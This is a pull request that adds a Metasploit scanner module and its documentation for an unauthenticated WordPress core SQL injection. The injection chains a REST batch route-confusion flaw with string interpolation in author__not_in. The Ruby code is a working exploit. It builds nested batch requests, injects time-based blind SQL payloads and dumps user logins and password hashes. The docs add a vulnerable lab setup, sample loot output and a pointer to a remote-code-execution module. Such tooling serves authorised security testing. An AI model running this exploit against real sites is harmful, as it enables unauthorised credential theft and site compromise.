### PR TITLE
Add WordPress wp2shell unauthenticated SQL injection module CVE-2026-63030

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/wordpress_wp2shell_sqli.md
+++ b/documentation/modules/auxiliary/scanner/http/wordpress_wp2shell_sqli.md
@@ -1,0 +1,84 @@
+## Vulnerable Application
+
+WordPress core versions **6.9.0 - 6.9.4** and **7.0.0 - 7.0.1** are affected by an
+unauthenticated SQL injection ("wp2shell") reachable through the REST API batch
+endpoint (`/batch/v1`). No plugins and no authentication are required.
+
+The batch controller (`serve_batch_request_v1()`) builds two parallel arrays, `$matches`
+(the matched handler per sub-request) and `$validation` (the validation result per
+sub-request), then indexes both by the same offset when dispatching. A sub-request whose
+path fails `wp_parse_url()` is appended to `$validation` but not to `$matches`, so the two
+arrays fall out of step and a sub-request is dispatched under a different sub-request's
+handler (**CVE-2026-63030**, route confusion).
+
+By nesting the primitive twice, a `GET` on the single-post item route
+`/wp/v2/posts/999999` carrying the collection-only parameter `author_exclude` is dispatched
+under the posts collection `get_items()` handler, where `author_exclude` maps to the
+`WP_Query` `author__not_in` query var. The vulnerable builds interpolate that value into SQL
+as a string (**CVE-2026-60137**), producing a pre-authentication boolean- and time-based
+blind SQL injection in the `post_author NOT IN (...)` clause.
+
+Fixed in WordPress 6.8.6, 6.9.5, 7.0.2, and 7.1-beta2 (2026-07-17).
+
+### Setting up a test environment
+
+1. Install a vulnerable core, for example WordPress 7.0.1:
+   ```
+   wp core download --version=7.0.1
+   ```
+   or run a container pinned to `wordpress:6.9.4`.
+2. Complete the install wizard so at least one post and one administrator exist.
+3. Confirm the REST batch endpoint answers:
+   ```
+   curl -s 'http://TARGET/?rest_route=/batch/v1' -X POST -H 'Content-Type: application/json' --data '{"requests":[]}'
+   ```
+
+## Verification Steps
+
+1. `msfconsole`
+2. `use auxiliary/scanner/http/wordpress_wp2shell_sqli`
+3. `set RHOSTS <target>`
+4. `set RPORT <port>` (and `set SSL true` for HTTPS)
+5. `run`
+6. The module confirms the route-confusion primitive, confirms the time-based blind SQLi,
+   and dumps `COUNT` rows of `user_login` and `user_pass` from the WordPress users table.
+
+## Options
+
+### COUNT
+
+Number of users to enumerate from the users table (default: 3).
+
+### TARGETURI
+
+Base path to the WordPress application (default: `/`).
+
+## Scenarios
+
+### WordPress 7.0.1
+
+```
+msf6 > use auxiliary/scanner/http/wordpress_wp2shell_sqli
+msf6 auxiliary(scanner/http/wordpress_wp2shell_sqli) > set RHOSTS 192.0.2.10
+msf6 auxiliary(scanner/http/wordpress_wp2shell_sqli) > run
+
+[+] 192.0.2.10:80 - REST batch route-confusion detected (CVE-2026-63030)
+[+] 192.0.2.10:80 - Unauthenticated time-based blind SQL injection confirmed (CVE-2026-60137)
+[+] {WPSQLi} Retrieved default table prefix: 'wp_'
+    wp_users
+    ========
+    user_login  user_pass
+    ----------  ---------
+    admin       $P$B........................
+[+] Loot saved to: /root/.msf4/loot/....._wordpress.users_......txt
+[*] Scanned 1 of 1 hosts (100% complete)
+```
+
+## Notes
+
+- The module is read-only. It does not create posts, users, oEmbed cache entries, or other
+  content; it only confirms the primitive and reads from the users table over the blind sink.
+- Extraction is time-based blind, so a slow or heavily loaded target may need `SqliDelay`
+  raised. `X-WP-Total` on the confused `get_items()` response is the boolean oracle.
+- The `?rest_route=/batch/v1` form is used so the module works on installs without pretty
+  permalinks, including where `/wp-json/` is headless-fronted or blocked.

--- a/documentation/modules/auxiliary/scanner/http/wordpress_wp2shell_sqli.md
+++ b/documentation/modules/auxiliary/scanner/http/wordpress_wp2shell_sqli.md
@@ -18,20 +18,65 @@ under the posts collection `get_items()` handler, where `author_exclude` maps to
 as a string (**CVE-2026-60137**), producing a pre-authentication boolean- and time-based
 blind SQL injection in the `post_author NOT IN (...)` clause.
 
-Fixed in WordPress 6.8.6, 6.9.5, 7.0.2, and 7.1-beta2 (2026-07-17).
+| Branch | Vulnerable | Fixed |
+| ------ | ---------- | ----- |
+| 6.8.x | 6.8.0 - 6.8.5 (CVE-2026-60137 SQLi only, no route confusion) | 6.8.6 |
+| 6.9.x | 6.9.0 - 6.9.4 | 6.9.5 |
+| 7.0.x | 7.0.0 - 7.0.1 | 7.0.2 |
+
+This module targets the complete unauthenticated route-confusion and SQL injection chain,
+so it supports WordPress 6.9.0 - 6.9.4 and 7.0.0 - 7.0.1. The 6.8.x branch contains only
+the separately gated SQL injection and is not affected by the unauthenticated chain.
 
 ### Setting up a test environment
 
-1. Install a vulnerable core, for example WordPress 7.0.1:
-   ```
-   wp core download --version=7.0.1
-   ```
-   or run a container pinned to `wordpress:6.9.4`.
-2. Complete the install wizard so at least one post and one administrator exist.
-3. Confirm the REST batch endpoint answers:
-   ```
-   curl -s 'http://TARGET/?rest_route=/batch/v1' -X POST -H 'Content-Type: application/json' --data '{"requests":[]}'
-   ```
+The following `docker-compose.yml` starts a vulnerable WordPress 6.9.4 instance with a
+MySQL 8.0 backend on port 8080:
+
+```yaml
+services:
+  wordpress:
+    image: wordpress:6.9.4
+    restart: always
+    ports:
+      - 8080:80
+    environment:
+      WORDPRESS_DB_HOST: db
+      WORDPRESS_DB_USER: wordpress
+      WORDPRESS_DB_PASSWORD: wordpress
+      WORDPRESS_DB_NAME: wordpress
+    volumes:
+      - wordpress:/var/www/html
+
+  db:
+    image: mysql:8.0
+    restart: always
+    environment:
+      MYSQL_DATABASE: wordpress
+      MYSQL_USER: wordpress
+      MYSQL_PASSWORD: wordpress
+      MYSQL_RANDOM_ROOT_PASSWORD: '1'
+    volumes:
+      - db:/var/lib/mysql
+
+volumes:
+  wordpress:
+  db:
+```
+
+Start the containers and complete the install wizard at `http://127.0.0.1:8080/`, leaving
+the default *Hello World!* post in place:
+
+```
+docker compose up -d
+```
+
+Confirm the REST batch endpoint answers:
+
+```
+curl -s 'http://127.0.0.1:8080/?rest_route=/batch/v1' -X POST \
+  -H 'Content-Type: application/json' --data '{"requests":[]}'
+```
 
 ## Verification Steps
 
@@ -76,6 +121,9 @@ msf6 auxiliary(scanner/http/wordpress_wp2shell_sqli) > run
 
 ## Notes
 
+- For the full remote code execution chain, use
+  `exploit/multi/http/wp_batch_desync_rce`. This auxiliary module is the read-only option
+  for confirming the vulnerabilities and extracting WordPress user hashes.
 - The module is read-only. It does not create posts, users, oEmbed cache entries, or other
   content; it only confirms the primitive and reads from the users table over the blind sink.
 - Extraction is time-based blind, so a slow or heavily loaded target may need `SqliDelay`

--- a/documentation/modules/exploit/multi/http/wp_batch_desync_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_batch_desync_rce.md
@@ -238,6 +238,8 @@ Linux 0ec0bdb23fd6 7.0.0-28-generic #28~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed J
 
 ## Notes
 
+* For read-only vulnerability confirmation and WordPress user-hash extraction, use
+  `auxiliary/scanner/http/wordpress_wp2shell_sqli`.
 * The payload runs from inside the uploaded plugin directory, which FileDropper
   then deletes; a harmless `sh: 0: getcwd() failed` notice may appear on the
   first command as a result. It does not affect the session.

--- a/modules/auxiliary/scanner/http/wordpress_wp2shell_sqli.rb
+++ b/modules/auxiliary/scanner/http/wordpress_wp2shell_sqli.rb
@@ -1,0 +1,153 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Exploit::Remote::HTTP::Wordpress::SQLi
+  include Msf::Auxiliary::Scanner
+
+  # A deliberately malformed path (no host, no port) for which wp_parse_url() returns false.
+  # It seeds one WP_Error into the batch request list, desynchronising $matches from $validation
+  # so a sub-request is dispatched under the following sub-request's handler.
+  DESYNC_PRIMER = { 'method' => 'POST', 'path' => '///' }.freeze
+
+  # The single-post item route. Its ID need not exist; it just matches the item route, whose
+  # schema does not validate the collection-only author_exclude param.
+  ITEM_SOURCE = '/wp/v2/posts/999999'.freeze
+
+  # Error codes a desynchronised (vulnerable) batch controller emits for the benign marker probe.
+  MARKER_CODES = %w[parse_path_failed block_cannot_read rest_batch_not_allowed].freeze
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'WordPress Core wp2shell Unauthenticated SQL Injection via REST Batch Route Confusion',
+        'Description' => %q{
+          WordPress core 6.9.0 - 6.9.4 and 7.0.0 - 7.0.1 are affected by an unauthenticated
+          SQL injection reachable through the REST API batch endpoint (/batch/v1).
+
+          The batch controller builds parallel $matches (the matched handler per sub-request)
+          and $validation (the validation result per sub-request) arrays, then indexes both by
+          the same offset when dispatching. A sub-request whose path fails wp_parse_url() is
+          appended to $validation but not to $matches, desynchronising the two arrays so a
+          sub-request is dispatched under a different sub-request's handler (CVE-2026-63030).
+
+          Nesting the primitive twice lets a GET on the single-post item route
+          /wp/v2/posts/999999, carrying the collection-only parameter author_exclude, be
+          dispatched under the posts collection get_items() handler, where author_exclude maps
+          to the WP_Query author__not_in query var. The vulnerable builds interpolate that value
+          into SQL as a string (CVE-2026-60137), producing a pre-authentication boolean- and
+          time-based blind SQL injection in the post_author NOT IN (...) clause.
+
+          This module confirms the route-confusion primitive with a benign marker probe, then
+          uses a time-based blind injection to dump WordPress user logins and password hashes.
+          It is read-only and does not create posts, users, or other content.
+        },
+        'Author' => [
+          'dividesbyzer0', # Metasploit module
+          'Searchlight Cyber' # wp2shell discovery and advisory
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2026-63030'],
+          ['CVE', '2026-60137'],
+          ['URL', 'https://www.rapid7.com/blog/post/etr-cve-2026-63030-wp2shell-a-critical-remote-code-execution-vulnerability-in-wordpress-core/'],
+          ['URL', 'https://blog.zsec.uk/wp2shell-code-trace-deep-dive/'],
+          ['URL', 'https://github.com/Icex0/wp2shell-poc']
+        ],
+        'Actions' => [
+          ['List Users', { 'Description' => 'Dump username and password hash for COUNT users via blind SQLi' }]
+        ],
+        'DefaultAction' => 'List Users',
+        'DisclosureDate' => '2026-07-17',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
+      )
+    )
+    register_options([
+      OptInt.new('COUNT', [false, 'Number of users to enumerate', 3])
+    ])
+  end
+
+  # POST a batch payload to the unauthenticated REST batch endpoint. The ?rest_route= form works
+  # on any install, including the plain-permalinks default; /wp-json/ would require pretty permalinks.
+  def batch_post(payload)
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/'),
+      'vars_get' => { 'rest_route' => '/batch/v1' },
+      'ctype' => 'application/json',
+      'data' => payload.to_json
+    )
+  end
+
+  # Benign detection: a batch arranged so that only a desynchronised (vulnerable) controller emits
+  # the full MARKER_CODES set. No SQL is injected and no content is created.
+  def route_confusion?
+    res = batch_post(
+      'requests' => [
+        DESYNC_PRIMER,
+        { 'method' => 'POST', 'path' => '/wp/v2/posts' },
+        { 'method' => 'POST', 'path' => '/wp/v2/block-renderer/core/archives' },
+        { 'method' => 'POST', 'path' => '/batch/v1', 'body' => { 'requests' => [] } }
+      ]
+    )
+    return false unless res
+
+    body = res.body.to_s
+    MARKER_CODES.all? { |code| body.include?(code) }
+  end
+
+  # Build and send the double-nested route-confusion payload that lands +payload+ in the
+  # author__not_in SQL clause. Used as the injection transport for the SQLi engine.
+  def inject(payload)
+    num = Rex::Text.rand_text_numeric(4, 0)
+    ali = Rex::Text.rand_text_alpha(4)
+    # Break out of post_author NOT IN (<value>); wrap the engine payload in an uncorrelated derived
+    # table so a time-based SLEEP fires once, not once per matched row; comment out the remainder.
+    author_exclude = "0) AND (SELECT #{num} FROM (SELECT(#{payload}))#{ali})-- -"
+    inner = {
+      'requests' => [
+        DESYNC_PRIMER,
+        { 'method' => 'GET', 'path' => "#{ITEM_SOURCE}?author_exclude=#{Rex::Text.uri_encode(author_exclude, 'hex-normal')}" },
+        { 'method' => 'GET', 'path' => '/wp/v2/posts' }
+      ]
+    }
+    outer = {
+      'requests' => [
+        DESYNC_PRIMER,
+        { 'method' => 'POST', 'path' => '/wp/v2/posts', 'body' => inner },
+        { 'method' => 'POST', 'path' => '/batch/v1', 'body' => { 'requests' => [] } }
+      ]
+    }
+    res = batch_post(outer)
+    fail_with(Failure::Unreachable, "#{peer} - Connection failed") unless res
+  end
+
+  def run_host(_ip)
+    unless route_confusion?
+      print_error("#{peer} - REST batch route-confusion markers absent; target is patched or not affected")
+      return
+    end
+    print_good("#{peer} - REST batch route-confusion detected (CVE-2026-63030)")
+
+    @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind, opts: { hex_encode_strings: true }) do |payload|
+      inject(payload)
+    end
+
+    unless @sqli.test_vulnerable
+      print_bad("#{peer} - Time-based blind SQLi did not confirm; raise SqliDelay for a slow target")
+      return
+    end
+    print_good("#{peer} - Unauthenticated time-based blind SQL injection confirmed (CVE-2026-60137)")
+
+    wordpress_sqli_initialize(@sqli)
+    wordpress_sqli_get_users_credentials(datastore['COUNT'])
+  end
+end

--- a/modules/auxiliary/scanner/http/wordpress_wp2shell_sqli.rb
+++ b/modules/auxiliary/scanner/http/wordpress_wp2shell_sqli.rb
@@ -66,12 +66,13 @@ class MetasploitModule < Msf::Auxiliary
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'SideEffects' => [IOC_IN_LOGS],
-          'Reliability' => []
+          'Reliability' => [],
+          'RelatedModules' => ['exploit/multi/http/wp_batch_desync_rce']
         }
       )
     )
     register_options([
-      OptInt.new('COUNT', [false, 'Number of users to enumerate', 3])
+      OptInt.new('COUNT', [true, 'Number of users to enumerate', 3])
     ])
   end
 
@@ -107,7 +108,7 @@ class MetasploitModule < Msf::Auxiliary
   # Build and send the double-nested route-confusion payload that lands +payload+ in the
   # author__not_in SQL clause. Used as the injection transport for the SQLi engine.
   def inject(payload)
-    num = Rex::Text.rand_text_numeric(4, 0)
+    num = rand(1000..9999).to_s
     ali = Rex::Text.rand_text_alpha(4)
     # Break out of post_author NOT IN (<value>); wrap the engine payload in an uncorrelated derived
     # table so a time-based SLEEP fires once, not once per matched row; comment out the remainder.
@@ -130,9 +131,26 @@ class MetasploitModule < Msf::Auxiliary
     fail_with(Failure::Unreachable, "#{peer} - Connection failed") unless res
   end
 
-  def run_host(_ip)
+  def check_host(_ip)
+    unless wordpress_and_online?
+      return Msf::Exploit::CheckCode::Safe('Server is not online or was not detected as WordPress')
+    end
+
     unless route_confusion?
-      print_error("#{peer} - REST batch route-confusion markers absent; target is patched or not affected")
+      return Msf::Exploit::CheckCode::Safe('REST batch route-confusion markers are absent; target is patched or not affected')
+    end
+
+    Msf::Exploit::CheckCode::Vulnerable('REST batch route confusion detected (CVE-2026-63030)')
+  end
+
+  def run_host(ip)
+    if datastore['COUNT'].negative?
+      fail_with(Failure::BadConfig, 'COUNT must be zero or greater')
+    end
+
+    check_code = check_host(ip)
+    unless check_code == Msf::Exploit::CheckCode::Vulnerable
+      print_error("#{peer} - #{check_code.message}")
       return
     end
     print_good("#{peer} - REST batch route-confusion detected (CVE-2026-63030)")


### PR DESCRIPTION
### Summary

Adds an auxiliary scanner module for the "wp2shell" WordPress core unauthenticated SQL injection: REST batch route confusion (CVE-2026-63030) chained with the `WP_Query` `author__not_in` string interpolation (CVE-2026-60137). Affects WordPress core 6.9.0-6.9.4 and 7.0.0-7.0.1 (fixed in 6.9.5 / 7.0.2, 2026-07-17).

The batch controller indexes its `$matches` (handler) and `$validation` arrays by the same offset; a sub-request whose path fails `wp_parse_url()` is appended to `$validation` but not `$matches`, so a sub-request is dispatched under the wrong handler. Nesting the primitive twice lands `author_exclude` on the `/wp/v2/posts/999999` item route into the posts collection `get_items()` handler, where it maps to `WP_Query author__not_in` and is interpolated into SQL as a string.

The module:
- confirms the route-confusion primitive with a benign marker probe (no SQL injected, no content created);
- confirms a time-based blind injection through the confused handler;
- dumps `user_login` / `user_pass` from the users table via the WordPress SQLi mixin.

Read-only; creates no posts, users, or oEmbed cache entries. The `?rest_route=/batch/v1` form is used so it works without pretty permalinks.

### Verification

- msftidy clean; module loads and `info` renders.
- On a vulnerable 6.9.x / 7.0.1 install: `use auxiliary/scanner/http/wordpress_wp2shell_sqli`, set `RHOSTS`/`RPORT`, `run`; the module confirms the primitive and dumps user hashes.

Documentation is included under `documentation/modules/`.
